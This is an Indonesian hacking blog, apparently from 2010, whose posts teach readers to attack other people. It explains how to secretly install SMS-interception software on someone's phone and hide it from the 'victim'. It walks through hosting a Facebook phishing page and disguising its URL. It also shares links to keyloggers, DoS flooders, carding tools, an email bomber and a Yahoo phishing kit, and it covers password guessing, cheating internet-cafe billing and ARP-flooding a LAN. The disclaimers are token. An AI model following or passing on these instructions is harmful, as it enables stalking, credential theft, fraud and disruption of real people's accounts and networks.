Fish

Welcome

Selamat Datang di Blognya Orang Toli-toli

kaki kucing ada berapa??

Jumat, 07 Mei 2010

Software Sadap Sms Orang Terdekat Kita

Sebuah layanan gratis untuk memonitor ponsel diluncurkan oleh Bloove.com. Fitur yang ada di antaranya adalah mem-forward SMS (yang juga berarti menyadap SMS), mengimport kontak dari ponsel yang terdaftar ke database Bloove, bahkan Anda bisa mengirim SMS lewat layanan ini. Persyaratan yang paling penting agar dapat memfungsikan layanan ini adalah ponsel yang dijadikan target harus terintegrasi koneksi GPRS. Sekarang tunggu apa lagi? Let's try it!

Caranya tidak terlalu rumit. Berikut tutorial untuk menyadap SMS lewat Internet :

1. Sebelumnya silahkan lihat compatibel list (tipe ponsel yang cocok dengan layanan ini). Bila ponsel target ada di dalamnya, langsung saja membuat akun agar dapat menggunakan layanan ini. Segeralah mendaftarkan diri ke www.bloove.com (gratis - tidak dipungut biaya sepeserpun) untuk mendapatkan akun. Isi formulir registrasi, Anda hanya butuh email untuk mendaftar.






2. Abaikan saja dulu pada tab Agent ID.


3. Setelah registrasi selesai Anda akan langsung digiring masuk ke halaman profile. Anda akan disuruh mengisi tab Enter ID displayed by Agent. Abaikan lagi.














4. Kini yang perlu Anda lakukan adalah men-setting ponsel target agar dapat tersinkronisasi dengan database Bloove. Pertama download aplikasi ini (http://bloove.com/m) menggunakan ponsel target. Atau Anda bisa mendownload-nya langsung dari PC/Laptop kemudian transfer kan ke ponsel target. Jangan lupa install aplikasi tersebut di ponsel target.

5. Setting dulu permission (izin)-nya (untuk hape Java), ga tahu yang lain.

Option > Application access > Communication > Network access > Always allowed > Yes
Option > Application access > Communication > Messaging > Always allowed > Yes
Option > Application access > Communication > Connectivity > Always allowed > Yes
Option > Application access > Data access > Multimedia recording > Always allowed > Yes
Option > Application access > Data access > Read user data > Always allowed > Yes
Option > Application access > Data access > Add and edit data > Always allowed > Yes
Option > Application access > Data access > Smart card > Always allowed > Yes
Option > Application access > Auto-start > Always allowed > Yes


6. Catat ID yang Anda dapatkan. Isikan ID tersebut di tab Enter ID displayed by Agent yang Anda abaikan tadi. Ikuti petunjuk di bawahnya. Isikan tipe ponsel target.

7. Bila status online berarti ponsel tersebut berada dalam jangkauan GPRS yang telah tersinkronisasi dengan Bloove. Yang berarti pula ponsel target telah resmi dimata - matai. Heheh.. :-D

Ingat, satu akun untuk satu nomor handphone saja. Sebenarnya masih banyak fitur 'mengejutkan' yang tersedia di layanan ini. Jika ingin tahu coba saja sendiri! Namun sayang untuk tipe hape ber-platform Java hanya bisa mengimport kontak dari hape target. Sedikit tips dari saya, sebisa mungkin sembunyikan aplikasi ini agar tidak ketahuan korban. Tidak perlu khawatir dengan pulsa target, karena hanya di-charged biaya GPRS yang sangat kecil nominal nya.blogger-emoticon.blogspot.com
Anyway, tutorial hacking SMS ini hanyalah sekedar info. Tidak ada niat jahat yang terselubung, penilaian akhir saya kembalikan pada Anda. Terakhir, saya berpesan agar menggunakan layanan ini dengan benar dan jangan sampai melanggar kode etik (paling ngga jangan terlalu lah).

Rabu, 05 Mei 2010

Cara Mudah Download Unlimited di Megaupload

Banyak orang yang kadang-kadang ada masalah ketika download dari Megaupload.com Berikut beberapa solusi yang dapat Anda coba untuk mendapatkan unlimited download atau download sepuasnya dari megaupload seperti pengguna premium account.

Berikut adalah langkah-langkah:

1) Jika Anda sudah mendownload toolbar Megaupload dan diinstal pada komputer anda, uninstall terlebih dahulu karena toolbar tersebut berisi spyware.


2) Download Mozilla Firefox browser, kalau sudah punya ikuti langkah selanjutnya.


3) Setelah Install firefox, gunakan add-ons dari firefox sebut saja user agent switcher bisa didownload dari sini.


4) Setelah menambahkan addon ini, pergi ke:

menu —> Tool —> user agent swither —> option —> add


5) Ikuti ini untuk mengisi formulir yang ada:


Description : MEGAUPLOAD
User agent : Mozilla/4.0 ( compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar )


Selesai . . ,
sebelum download di megaupload pergi dahulu ke


tool —> user agent —> megaupload


sekedar Trik dari Hackertoliz. anda bisa download sepuasnya di megaupload tanpa menunggu waktu yang lama.

selamat mencoba . .
semoga bermanfaat . .

Free download Tool Hacking Lengkap 2009.

Siapa yang butuh koleksi tool hacking di bulan Ramadhan ini ??
hayo". :))

sekedar share ke para peminat hacking seperti saya.
hehehehehehe

disini lengkap sekali.
puluhan tool hacking, mulai dari :

  • Tool hacking wireless
  • keyloggers
  • Mail Bomber
  • Scanners
  • Tool Crackers



mau ??
silahkan sedot toolnya di link bawah ini :
Free Download Kumpulan tool Hacking *klik disini


mungkin disana gratis download disana tetapi sebagian dari tool tersebut ada yang shareware, kita harus membayar untuk mempergunakannya.
ingatt !! masih sebagian saja.

Download CD Khusus Tool Hacking dan Cracking Gratis

Photobucket


XxxPass-Team 2007 | Danger Cracking & Hacking Tools - Ver 1.0

- Exploit Collection (4 Tools)
- Google Hacking (4 Tools)
- Keyloggers (5 Tools)
- Binder & Packer (15 Tools)
- Flood_DOS (20 Tools)
- Messenger (11 Tools)
- Bruter (9 Tools)
- Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
- AIO

Exploit Collection

1. 10377 Exploit
2. SMF ShoutBox Xss & HTML Injection
3. SMF Ultimate Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG

Messenger

  • 1. MSN Extreme 3.0
  • 2. MSN Spy Lite v1.0
  • 3. Yahoo Hack!
  • 4. Hotmail Email Hacker
  • 5. Hotmail Hacker Gold
  • 6. HotmailHack
  • 7. YahooUltraCracker
  • 8. winks,moods,mugins,weemees and meegos + Installer
  • 9. MSN Messenger Account Cracker v2.0
  • 10. SH Yahoo Pass Sender 1.1
  • 11. Yahoo Password Decoder

Google Hacking

1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink

Keyloggers

  • 1. Elgolf 1.0 Beta
  • 2. ESK KeyLogger
  • 3. Glog Keylogger
  • 4. HermanAgent
  • 5. IKlogger0.1

Bbruter

1. WebCrack v4.0
2. Brutus
3. Crack FTP
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer

!!! $$$ !!!

  • 1. Cmaster
  • 2. CC Verify
  • 3. CWizard
  • 4. THCC
  • 5. Visa Card Generator 06
  • 6. Carcabot_Mass_Email
  • 7. CcHack
  • 8. CC-Fake
  • 9. cvv2c
  • 10. DesertCVV2
  • 11. id-fake
  • 12. Paypal-Link-Spoofed
  • 13. HoW to get Credit Cards Fresh and Fastest

AIO

1. Uploader for All
2. Cool Small Usefull Dp

Flood DOS
  • 1. Flowbabeflow
  • 2. FreeSiteKiller V 2.01
  • 3. Webxgrab
  • 4. Web Attacker ENG
  • 5. TheRapist-Dos Attacker
  • 6. HybridFlood2
  • 7. Ati-russ 3.0
  • 8. Http Bomber v1.001b
  • 9. Sprut
  • 10. DoS_5
  • 11. etherflood
  • 12. DoSAttacker
  • 13. phpBB Dos
  • 14. phpBB Attacker
  • 15. Ping Attack
  • 16. Site Nuke
  • 17. Divine Intervention
  • 18. UC Forum Spammer
  • 19. Inferno Nuker
  • 20. Multiple Site Flood

Mau ?? 176 MB.
silahkan download di link bawah ini.
==> via Indowebster.

"Free Download Tool Hacking dan Cracking *klik disini"

password ==> XxxPass_DJ_haselking


==> via Rapidshare

1. http://rapidshare.com/files/85433778/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part1.rar

2. http://rapidshare.com/files/85426770/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part2.rar

Pass : XxxPass_DJ_haselking
Pass : -XxxPass_DJ_haselking

thank's to,
. http://ilmuwebsite.com

download e-book tentang hack, bahasa indonesia

lagi - lagi e-book .

tapi sekarang beda .
yang sering aku tunjukan ke kamukan biasanya berbahasa inggris tapi sekarang bedah ada lagi nee e-book buatan indonesia .

silahkan download disini :

http://www.yogyafree.net/paktani.zip
http://www.yogyafree.net/samarindahack.zip
http://www.yogyafree.net/malanghack.zip
http://www.yogyafree.net/kumpulbocah.rar



oiiia .
kitakan orang indonesia .
seharusnya kamu bangga dengan negara kita indonesia .

silahkan bergabung di :

http://www.banggamenjadiindonesia.com/


okee ??
good luck . . .

Cara mudah ngeBOMB email Orang Lain

Cara mudah ngeBOMB email Orang Lain

halo". lama tak jumpo. ...
kali ini HackerToliz posting cara Ngebomb email.
jadi pelajaran aja yaa.. jangan dipraktekkan betul lohh
saya tidak bertanggung jawab atas apa yang terjadi.

apa sih ngebomb email itu?

ngebomb email itu mengirim email dengan sesuka kita ke email target, dan juga email dapat kita kirim dalam jumlah banyak hingga mungkin akan memenuhi mailbox server/tukang pos (tempat smtp server yang rela mengirim email tanpa diverifikasi), dan jika email yang kita tuju (email korban/email asli) dibuka maka surat/email kita akan juga beralih memenuhi mailbox korban.

Jadi prinsip dari ngeBomb email ini adalah mengirim sebanyak-banyak pesan dengan email kita sehingga memenuhi server/tukang pos, dan jika si empunya email/korban menarik surat maka gantian korban yang mailboxnya kebanjiran surat kita. Akibat dari mail bomber ini adalah menghabiskan ruang hardisk server serta korban sehingga resourcenya habis.

udah jelas too??
itu penjelasan dari http://vbasiccode.blogspot.com.

lebih jelasnya lagi lihat video dibawah ini aja,
jangan lupa sediain kopi ma kacang Garuda asli buatan INDONESIA. yaa ??
loh kog malah promosi'in kacang garuda??





gmnn ??
jelas to..

tapi tool kali ini sangat sayang sekali,
karena masih harus menggunakan account Gmail.
jadi saya saranakan buat account Gmail lagi aja.

download toolnya di :
http://www.ziddu.com/download/6965078/EmailBomber-Pedasmaniscinta.rar.html

maaf saya upload di ziddu.
coz Indowebster masih ada kendala.

oiya kalao error kasih komentnya y !!
soalnya temen saya pas main di warnet g bisa jalan tapi pas saya jalankan di OS Vista engga terhubung jaringan LAN bisa.
buwat referensi aja.

semog tidak bermanfaat !!
kalao bermanfaat nanti malah bahaya. hehehehehe.
oleh : http://hackertoliz.blogspot.com

Tips mudah untuk Hack / Cheat Travian online

Travian adalah Jerman berbasis browser permainan yang mungkin salah satu yang paling sukses di luar sana saat. Saat ini ada lebih dari 3 juta pemain di seluruh dunia.



Travian
Travian Indonesia Online juga memberikan permainan pasar yang sangat goo dampak. Terdapat lebih dari 5000 pemain online yang terakhir kali saya diperiksa. Saya rasa ini dapat dianggap sebagai salah satu game online di sekitar jaringan.

Saya membuat sebuah ID dan ada tes untuk beberapa saat, sehingga saya menemukan beberapa bug s cara / tips (cheats) untuk memberikan keuntungan bermain Travian.


1. Periksa apakah anda pemain lawan yang online atau tidak

Keberhasilan tingkat cheat ini sangat bagus. I tried it myself ke tetangga saya player. Dan saya menilai keberhasilan menentukan apakah mereka sedang online atau tidak, hampir 100% bekerja.

Untuk melakukannya, Anda hanya perlu mengirimkan pesan ke lawan. Dan setelah beberapa menit, klik pesan terkirim item.

untuk jelasnya lihat gambar di :
http://zoiz.web.id/images/online.jpg

Teks dalam kotak merah berarti 'belum dibaca'. Jika sudah tidak ada pemberitahuan (yang belum dibaca status) beberapa jam setelah Anda mengirim pesan, berarti anda lawan yang sedang online.


Tapi meskipun status belum ada, Anda mungkin tidak akan lawan secara offline pada saat ini. Tetapi sebagian besar waktu, orang akan membaca pesan yang masuk segera J nice Travian Hack bukan?

2. Menggunakan Travian (Cheat / Hacking) Softwares

GreaseMonkey Mozilla Firefox adalah sebuah add-on yang memungkinkan Anda untuk menyesuaikan cara menampilkan sebuah halaman web menggunakan JavaScript bit kecil. GreaseMonkey dapat didownload dari sini.

Dan anda perlu mencari sesuai travian script dari mesin pencari seperti
Google, menggunakan kata kunci "Travian Script" atau yang lain. Anda mungkin ke tanah http://userscripts.org.

Mereka menyediakan berbagai travian script yang akan membantu Anda banyak bermain Travian. Anda dapat seperti antrian karena banyak tugas sebagai Travian bahkan mungkin jika anda tidak memiliki 'Travian Plus' diaktifkan.

Sebelum menginstal script, hanya pastikan GreaseMonkey add-on diaktifkan. Dan klik pada tombol INSTALL UserScripts.org disediakan untuk menginstal.


referensi :
http://zoiz.web.id

GOOGLE HACK

Google adalah alat pencarian yang cukup kuat. Anda tahu itu. Anda dapat menggunakannya untuk mencari informasi, tetapi Anda juga dapat menggunakannya untuk menemukan MP3 download, buku, video, dan item lainnya. Kami akan menganggap Anda hanya mencari download yang tersedia secara hukum, tetapi kenyataannya adalah jika seseorang mencatat MP3 (hak cipta atau tidak) untuk halaman web mereka, Google dapat menemukannya.

Tapi siapa yang memiliki waktu untuk menghafal semua pengubah pencarian seperti "-inurl: (htm | html | php) intitle:" index of "+" terakhir diubah "+" parent directory "+ description + size + (. Mp3 |. Wma | ogg). " Itu di mana Google Hacks masuk app kecil ini berguna akan membiarkan Anda mencari puluhan jenis file, lirik lagu, halaman cache, font, dan barang kecil lainnya nongkrong di web.

Hanya men-download dan menginstal Google Hacks untuk Mac Linux, atau Windows, api itu dan masukkan istilah pencarian Anda dan centang kotak di sebelah tipe pencarian Anda ingin tampil. Hasil Anda akan muncul di web browser default.

untuk menggunakannya dpt didownload lewat ini :
http://rapidshare.com/files/101727238/google-hacks1.6.rar

HACK WAKTU BILLING Warnet CyberBilling All Version

ini adalah trik untuk menghentikan billing yang biasa ada diwarnet.
bisa dilambatin sma bisa diberhentiin .

pakai Cheat Engine v5.3

download disini .
untuk tutorialnya .
cyberbilling-ray16 Url:
http://www.indowebster.com/cyberbillingray16.html

Diupload tgl: 20/02/08 Size: 186.82MB

Vurln nya di sinkronisasi waktu server sma client,
coz
Client > Server
kalo klien waktunya berhenti / lambat di server pun juga gitu .

cara, tapi jng ketahuan servernya ya ??
1. SETELAH PAKAI CHEAT ENGINE DAN WAKTU BERHENTI / LAMBAT
2. SETELAH PUAS MAIN
3. RESTARTTTT!! DENGAN TOMBOL PANIC.

coba aja !!

cheat engine bisa didownload lewatb sini :
http://www.heijnen1.demon.nl/

setelah itu cari cheat engine v5.3 .


dan selamat mencoba .

Hacking email yahoo

Hacking email yahoo

sesuai permintaan para setia HackerToliz untuk, bagaimana caranya menghack email yahoo, atau gmail ??
akhirnya pas di tanggal satu Juni ini saya dapat pengetahuan dari taman-teman hacking untuk cara menghack email.

sebelum membaca saya ingin memberitahu anda,
bahwa menghack email itu bukan suatu ilmu seorang hacker. tapi ilmu ini biasa digunakan para cracker.
apa sih cracker itu ? bisa dilihat disini


jadi ingat! kalau hacker itu masih punya kode etik jadi tidak diperkenankan untuk mengahancur, merusak, dan selalu bersifat merugikan.
oleh karena itu saya mohon maaf kepada para hacker.
ilmu ini jangan disebut-sebut bahwa hacker yang melakukan, tapi sebutlah bahwa cracker yang melakukan!

mengcracking email adalah cracking tingkat tinggi setelah bagaimana cara pembobolan bank, jadi ilmu ini sangat-sangat dirahasiakan.

oke, setelah puas membaca pemberitahuan dari HackerToliz.
langsung saja kita terjun ke lapangan.

mungkin sulit untuk diterangkan melalui blog ini.

jadi saya perkenankan mendownload
dahulu tutorialnya dengan beberapa script kecil.
silahkan download disini atau http://www.ziddu.com/download/4965378/HackEmail.rar.html


sudah mendownload ??

> lihat turorialnya dahulu [dalam video].

> lalu ubah file .htm yang terlampir satu file disana [bernama : yahoo] buka dengan notepad. cara merubahnya dengan notepad : klik kanan file yahoo, open with, lalu klik notepad.

> setelah terbuka notepad tulisan "ISI NAMA SESUAI KEINGINAN ANDA" itu rubah dengan nama terserah bisa dirubah dengan nama terserah anda.

> lalu coba lihat lagi video tutorialnya.




oke ?? sudah selesai sampai disini.

bila masih kurang jelas bisa beri komentar, insya allah pasti akan saya tanggapi.
ingat ini bukan perbuatan hacker tapi ini perbuatan cracker.

Mencuri / Mendapatkan password seseorang dengan ilmu pikiran

Layaknya seperti yang diajarkan the master Indonesia sebut saja Joe Sandy.
Joe Sandy pernah mengatakan “dengan ilmu pikiran kita pasti bisa”

Yang saya maksudkan disini adalah bukan trik sulap ala joe Sandy tetapi ini adalah cara untuk mengambil / mencuri data pribadi seperti email, friendster, facebook, ataupun userID dan password di jejaringan sosial manapun dengan ilmu pikiran kita.
Tetapi trik ini hanya bisa anda dapatkan dari teman dekat ataupun seseorang yang kita kenal.
Salah satu caranya adalah ikuti trik dibawah ini.

1.pastikan anda mengetahui alamat email atau userID sang korban. Tidak jauhlah untuk mengetahuinya contoh sang korban adalah teman dekat kita pasti kita tauhlah alamat emailnya atau userID-nya.

2.untuk mendapatkan password sang korban telitilah mulai dari :

>> nomor telepon (telepon genggam atau telepon rumah),
pastikan anda tahu nomor telepon sang korban. Dengan anda mengetahui no telepon sang korban pasti anda bisa menebak digit passwordnya. Karena setiap orang selalu menggunakan digit-digit angka yang mereka ingat jadi bisa juga nomor telepon digunakan sebagai password. Inilah yang saya populerkan untuk dicoba.

>> Tanggal Lahir
Dengan inipun juga bisa. Contoh sang korban lahir tanggal 10 bulan November tahun 1990. untuk menebak passwordnya sang korban gunakan kata kunci yang bisa, contoh: 10101990 (diurutkan lengkap dari tanggal lahir sang korban), 101090 (pengurangan sedikit dari tahun lahirnya).
Atau juga bisa tanggal jadian dengan sang kekasih korban. Hehehe .

>> Nama sang korban atau nama kekasihnya
Sepertinya ini jarang digunakan tetapi bisa saja kita mencobanya.
juga gunakan untuk mengambil passwordnya dengan nama panggilan uniknya.
Atau juga bisa tanggal jadian dengan sang kekasih korban. Hehehe .


Oke sedikit trik dari Hackertoliz, dimohon untuk mengerti dan dimohon jangan tertawa berlebihan karena kelihatannya seperti konyol tetapi ini adalah salah satu cara yang sangat berkhasiat untuk mendapatkan userID dan password seseorang di dalam dunia Maya ini.

Semoga bermanfaat . .

Cara Mudah Menghemat Biaya Pemakaian Internet Dengan Bantuan Software

Dengan bantuan software ini, kita bisa menghemat biaya internet untuk yang mengaksesnya melalui GPRS atau yang pembayaran internet berdasarkan volume based / ukuran KB dalam bandwith (yang dimaksudkan bukan time based).

Saya belum mengetahui benar dengan tool ini. tetapi saat dicoba oleh teman saya yang menggunakan koneksi dengan dial-up connection atau handphone, ternyata terbukti. lebih cepat dari sebelumnya yang sering putus koneksi.

Tool ini mirip seperti toonel, fungsinya mengompress file yang diload / dikeluarkan dari internet sesuai kebutuhan browser, tetapi dengan beberapa tambahan :
1. Mempunyai cache agar browsing lebih cepat lagi.
2. Bisa blok trojan downloader maupun konten virus lain yang membahayakan.
3. Bisa blok situs yang tidak dikehendaki seperti advertiser.
4. Bisa blok konten berbau pornografi dengan menambahkan kata pada filter konten.
5. Bisa menghemat uang anda dari bandwidth yang disave dari kompresi maupun cache.

coba lihat screen shootnya :

http://www.fileden.com/files/2008/10/9/2135535/Counter.JPG

@info
jadi dengan software ini kita bisa Menghemat Biaya Pemakaian Internet.


oke, langsung saja jika anda membutuhkannya silahkan download klik disini atau silahkan anda klik link dibawah ini
http://www.fileden.com/files/2008/10/9/2135535/Setup%20Internet%20Speed-Up%20V.1.12%20Final%2010%20Oct%202008.zip

selamat mencoba . . .
semoga bermanfaat . . .

3 URL Redirect Gratis Untuk fakelogin

3 URL Redirect Gratis

Url Redirect gratisRedirect URL itu sangat bermanfaat sekali untuk bisnis online ataupun keperluan lainnya,
termasuk kelakuan hacking. (says: hehehehe..)

apa sih url redirect itu?

Url redirect atau Redirect halaman secara sederhananya berfungsi untuk mengalihkan halaman yang satu ke halaman yang lain. Biasanya hal ini digunakan untuk mengalihkan ke halaman lain ketika terdapat perbaikan pada site, ataupun ketika melakukan authentikasi, ataupun pengisian database yang dijalankan melalui query menggunakan php ataupun server side scripting yang lain. (sumber: http://ilmuwebsite.com)

Sudah jelaskah ??
Begini deh contohnya :
saya sekarang menjalani bisnis affiliasi dengan alamat http://bagja.com/?id=dhendhie
lalu saya meredirect halaman tersebut ke suatu URL redirect gratis, jadinya seperti ini http://cepetsugih.cjb.net

bagaiamana samakan?
iyaa, seperti itulah URL redirect.

Lah berkenaan dengan topik kali ini saya akan membahas 3 URL Redirect gratis tanpa bayar.

1. http://cjb.net
Saya rekomendasikan dahulu disana, karena bukan hanya redirect url biasa yang disediakan melainkan redirect Url yang sangat luar biasa. perbedaanya sangat jauh dari redirect url yang banyak disediakan di internet sekaran. di Cjb.net kita diberikan suatu alamat yang alamat kita tuliskan berada di tengah domain cjb.net misalnya http://hackertoliz.cjb.net dan sedangkan url redirect lainya, lanjut gan!!

2. http://klik.ws
berbeda dengan cjb.net diatas. Di klik.ws anda akan mendapat url seperti ini http://www.klik.ws/hackertoliz jadi url yang kita masukan tidak berada ditengah domain.

3. http://lanjut.in
di lanjut.in ini sama dengan klik.ws mislanya : http://lanjut.in/hackertoliz

wahh ga tau nii,
kaya'nya mata sudah capek memandang layar monitor ini.
maaf saya harus pergi. kita lanjutkan materi esok dengan memanfaatkan aksi hacking dengan redirect url. hehehehehe

oiya sebagai tambahan yang ingin cari Redirect url lainnya silahkan masuk kesini.
hehehehe. byee...

Optimalkan Url fakelogin dengan Url redirect

phising facebook urloke langsung ke Persoalan.
Phising atau Fake login itu banyak ya bukan hanya phising facebook, friendster, dan lainnya.
saya pernah mendengar berita dulu tentang phising dari klikbca.com yang sebenarnya adalah clickbca.com (bener ga ya?? hehehee)

untuk kali ini agar mudah,
memakai Url phising facebook aja.

contoh dibawah ini adalah Url phising Facebook milik orang lain ngga tahu dari mana saya search dari googling. yang punya maaf ya saya masukin ke artikel ini. hehehe
Url Phising Facebooknya beralamat :

http://laeonardo.700megs.com/index.php

lah kalau beralamat seperti itu mungkin sulit ya menjebak orang untuk login kesitu, lalu cara termudah adalah meredirect url Phsingnya dengan url redirect gratis.
saya sarankan menggunakan redirect Url dari http://cjb.net
untuk pendaftaran lihat gambar dibawah ini.

klik gambar untuk lebih jelasnya.
phising facebook dengan redirect url cjb.net

Setelah anda daftarkan disana, Urlnya akan berubah seperti ini :

http://faceb00k.cjb.net

bagaimana?
lebih unik tidak? tapi sayangnya dengan Cjb.net ini mungkin terganggu akan iklan yang ada. tetapi tak apalah karena kita diberi gratis masa' ngroweng aja. hehehehe

Sebenarnya masih yang begus lagi yaitu dengan mengganti domain.
misal : http://facebo0k.co.cc
entah itu milik siapa? menurut saya itu sangat inovatif sekali.
mungkin bagi newbie seperti saya sangat membingungkan harus mengatur DNS dulu. ahh ribet mending pakai redirect Url aja. hahahaha

Sampai disini postingan kali ini.
selamat berlibur.
by : http://hackertoliz.blogspot.com

Facebook Freeze

baru saja saya mendapat lecehan pedas bertuliskan kata "bodoh" saat saya melihat komentar di postingan hacking facebook dengan login palsu [fakelogin]
karena saya belum tahu tentang apa maksudnya seseorang itu sebelumnya.

Setelah saya tahu maksudnya.
ternyata, saya dikasih sama orang itu aplikasi mini yang sangat berguna untuk ngehack facebook.

sofware / tool ini gratis dan portable tanpa install ukuran cuma 65kb, sebut saja tool Facebook Freeezer.
ini saya bagikan . ..
silahkan anda download dahulu di :

http://www.ziddu.com/download/5143091/GroundZerosFacebookFreezer.exe.html

coba lihat screen shootnya :


Cara menggunakannya mudah :
1. Masukkan email target anda
2. Tekan tombol Freeze
3. Tunggu hingga proses selesai 100%


4. Untuk membatalkan cukup tekan tombol Stop Freezing

Sangat mudah bukan?

Apa yang terjadi?
Yang terjadi, teman Anda akan kesulitan login, email yang Anda freez tadi akan beberapa kali passwordnya di salahkan oleh facebook
intinya adalah memblokir akun anda seolah-olah anda telah melalukan login yang tidak sah secara berulang kali.

untuk cara mengembalikannya agar tidak terblokir klik di sini.

sekedar pengetahuan.
selamat mencoba . .. .

[ UPDATE ]

Alat ini sudah tidak dapat digunakan lagi.
mohon maaf sebelumnya....

hacking facebook dengan login palsu [fakelogin]

hacking facebook dengan login palsu [fakelogin]

facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.

sesudah saya posting tentang cara login palsu di friendster, hari ini saya posting tentang cara membuat login palsu di facebook.
belum baca cara buat login palsu di friendster? baca dahulu disini

oke langsung saja.

1. silahkan anda daftar di http://www.700megs.com
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
bila tidak bisa terdaftar langsung saja masuk di :
http://www.700megs.com/register.jsp

2. setelah anda berhasil mendaftar di 700megs.com masuk ke FILE MANAGER...hapus file index.html.(akan ada di Cpanel masing2 nantinya)

3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.

4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di 700megs.com yang tadi anda sudah daftar.

5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]

6, alright! selesai sampai di sini. . .


untuk penyebarannya silahkan dengan cara masing2...

disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di www.700megs.com kalian..ambil URL nya.. [penting]

terus untuk pengguna firefox: buka tools>option>main

preview:
http://i410.photobucket.com/albums/pp190/eta_rrrrock/kidego1.jpg

disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.

atau..

bisa juga menyebarkan dengan cara seperti ini

http://i410.photobucket.com/albums/pp190/eta_rrrrock/32.jpg


kamu buat account baru,di yahoo,gmail,ato sejenisnya

dengan nick Facebook@ or something like that.

diatas cm contoh...silahkan kamu buat seni sendiri
enjoy..

mudahkan ??

semoga berhasil . . .

CARA MELIHAT TEMAN YANG BUKA FB KITA & GANTI BACKGROUND FB KITA

Hahahayyyy...
Assalamualaikkum warah matullahi, wabarakatuh...
Apa kabar pembaca setia Hackertoliz.blogspot.com wah mudah2an dalam keadaan sehat walafiat...
Nah sesuai janji penulis, kemarin ada mbak2 yang nanya gimana caranya melihat orang yang suka buka facebook kita? nah sekarang penulis mau menjawab... Baca dan pahami baik2 yach...
Untuk applikasi cara melihat orang yang senang buka atau yang sedang menjelajah facebook kita klik ARY MAZ PLEASE DOWNLOAD nah setelah itu,ikuti aja perintahnya, chek your fans NOW! selesai, pilih terbitkan,selesai dech...
Yang ke dua, gimana cara ganti latar atau background?
Nah baca dan pahami yach...
Untuk Aplikasi ini Anda/i harus mendowload programnya, klik aja ARY MAZ KEREN DAN BEKEN HABIS nah gampangkan, kalo pembaca ingin melihat langsung contohnya klik FACEBOOK ntar masuk ke facebook penulis... oh ia cara pasang aplikasi ini..., setelah Anda/i klik ADHA BEKEN KEREN HABIS, pilih dech menu yang disamping kanan, ada TOP STYLES, NEW STYLES dan UPDATE STYLES... Nah kalo yang penulis pake ntu namanya EMO styles..... Selamat mencoba dech...
kalo butuh bantuan buka fb penulis : GERYS ADHANISAL... disana ada nomor Hape... silahkan aja nghubungi..., jangan lupa comentnya... Demi penyempurnaan... he. he. he...
Thanks... Wass....

Selasa, 04 Mei 2010

Software Penyedot Bandwidth

Sebagai seorang network engineer, ketepatan-kecepatan-keakuratan adalah hal-hal yang fundamental dimiliki oleh tiap-tiap ahli networking. Namun,kadang kala karena berkembangnya tekhnologi maka kita perlu tau dan update juga,tentang hal-hal apa saja yang digunakan oleh seorang “intruder” dalam mengacaukan sistem jaringan yang kita buat.

Kali ini,saya akan menjelaskan bagaimana bahayanya software winarpattacker bagi suatu sistem jaringan yang terhubung LAN baik itu untuk jaringan warnet atau suatu perusahaan.

Pertama kita download software winarpattackernya (boleh lewat mana aja,cari di google udah banyak =p) kemudian disitu akan kita dapatkan file winarapattacker.exe dan winpcap. Nah kita install dahulu winpcapnya baru kemudian dijalankan winarpattackernya.

Disini saya menggunakan 2 buah komputer yang terhubung dengan lan di suatu warnet, yang berperan sebagai komputer pelaku dan komputer korban.
Komputer pelaku :
- IP addressnya 192.168.2.16
- Subnet mask 255.255.255.0
Image Hosted by UploadHouse.com
komputer korban :
ip address : 192.168.2.15
subnetmasknya : 255.255.255.0
Image Hosted by UploadHouse.com
setelah ditentukan komputer pelaku dan korban,maka kita mulai menjalankan winarpattacker.exe-nya. tampilannya sebagai berikut:
Image Hosted by UploadHouse.com
Setelah dilakukan scanning,didapat dari gambar tersebut, IP yang terhubung dalam 1 jaringan lan beserta mac address dan hostnamenya. Kemudian yang dilakukan adalah kita masuk options-attack-attack time setup.
Fungsi masing-masing parameter tersebut adalah :
-Arp Flood yaitu mengirim dan melakukan ip conflict paket ke komputer korban, yang dapat membuat komputer korban down dan lumpuh jika kita terlalu banyak mengirim paket.
-Ban Gateway adalah cara salah satu cara yang unik untuk mematikan aktifitas komputer korban dari akses ke internet. Dengan memberi perintah atau mengatakan kepada gateway bahwa komputer tersebut, memiliki mac address yg salah. Sehingga komputer target di blok akses ke internet oleh gateway.
-dll (cari sendiri ya di google =p)
Saat pelaksanaan serangan,kita setting arp flood mencapai 1000000 kemudian kita tekan attack,maka akan muncul gambar berikut :

Image Hosted by UploadHouse.com
Terjadi peningkatan yang tajam data arp penerima dari komputer korban, maka yang terjadi pada korban adalah :
Image Hosted by UploadHouse.com

Komputer tidak dapat digunakan,karena terjadi overload paket yang masuk kedalam jaringan dan dari sisi performance,terlihat sebagai berikut :
Image Hosted by UploadHouse.com

CPU usage mencapai 100% sehingga komputer sangat sulit untuk digunakan (gambar diatas diambil dari komputer yang berbeda dengan target adalah IP komputer sendiri).
Setelah arp flood,kita akan melakukan ban getaway, dengan mensetting waktu mencapai 200 maka diliat :
Image Hosted by UploadHouse.com
Dan hasil penetrasinya :
Image Hosted by UploadHouse.com
